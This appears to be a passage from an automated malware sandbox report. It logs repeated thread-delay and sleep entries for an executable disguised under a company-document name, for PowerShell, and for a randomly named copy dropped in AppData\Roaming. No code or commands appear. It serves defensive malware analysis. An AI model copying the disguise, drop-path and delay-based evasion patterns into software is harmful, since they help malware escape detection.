                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 600000Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599870Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599764Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599656Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599547Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599438Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599313Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599188Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 599078Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598969Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598844Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598734Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598625Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598516Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598406Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598297Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598188Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 598063Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597953Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597843Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597733Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597624Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597514Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597385Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597280Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597172Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 597063Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596938Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596813Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596703Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596594Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596469Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596360Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596235Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 596110Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595985Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595860Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595735Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595610Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595485Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595360Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595235Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 595110Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594985Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594843Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594494Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594391Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594266Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594141Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 594031Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeThread delayed: delay time: 593922Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 922337203685477Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 600000
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599890
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599781
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599672
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599562
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599445
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599328
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599216
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 599106
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598900
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598623
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598515
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598406
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598296
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598187
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 598078
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597968
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597859
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597750
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597640
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597531
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597421
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597312
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597203
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 597092
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596984
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596874
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596765
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596656
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596546
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596437
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596235
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 596084
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595811
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595692
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595562
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595453
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595344
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595223
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 595094
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594984
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594875
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594765
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594656
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594547
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594437
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594328
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594219
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 594109
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 593999
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeThread delayed: delay time: 593885
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4815Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6041Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeWindow / User API: threadDelayed 2673Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exeWindow / User API: threadDelayed 7158Jump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeWindow / User API: threadDelayed 2942
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exeWindow / User API: threadDelayed 6907
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7988Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5888Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6696Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5356Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5952Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep count: 31 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 420Thread sleep count: 2673 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -599870s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -599764s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -599547s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 420Thread sleep count: 7158 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -599438s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -599313s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -599188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -599078s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -598969s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -598844s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -598734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -598625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -598516s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -598406s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -598297s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -598188s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -598063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -597953s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -597843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -597733s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -597624s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -597514s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -597385s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -597280s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -597172s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -597063s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -596938s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -596813s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -596703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -596594s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -596469s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -596360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -596235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -596110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -595985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -595860s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -595735s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -595610s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -595485s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -595360s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -595235s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -595110s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -594985s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -594843s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -594494s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -594391s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -594266s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -594141s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -594031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Autofill Manufacturing Sdn Bhd 28-08-2024.exe TID: 7784Thread sleep time: -593922s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 6932Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep count: 37 > 30
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -34126476536362649s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -600000s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 6216Thread sleep count: 2942 > 30
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -599890s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -599781s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 6216Thread sleep count: 6907 > 30
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -599672s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -599562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -599445s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -599328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -599216s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -599106s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -598900s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -598623s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -598515s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -598406s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -598296s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -598187s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -598078s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -597968s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -597859s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -597750s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -597640s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -597531s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -597421s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -597312s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -597203s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -597092s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -596984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -596874s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -596765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -596656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -596546s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -596437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -596235s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -596084s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -595811s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -595692s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -595562s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -595453s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -595344s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -595223s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -595094s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -594984s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -594875s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -594765s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -594656s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -594547s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -594437s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -594328s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -594219s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -594109s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -593999s >= -30000s
                    Source: C:\Users\user\AppData\Roaming\GhrKoSGuCdvpJ.exe TID: 8172Thread sleep time: -593885s >= -30000s
                    Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
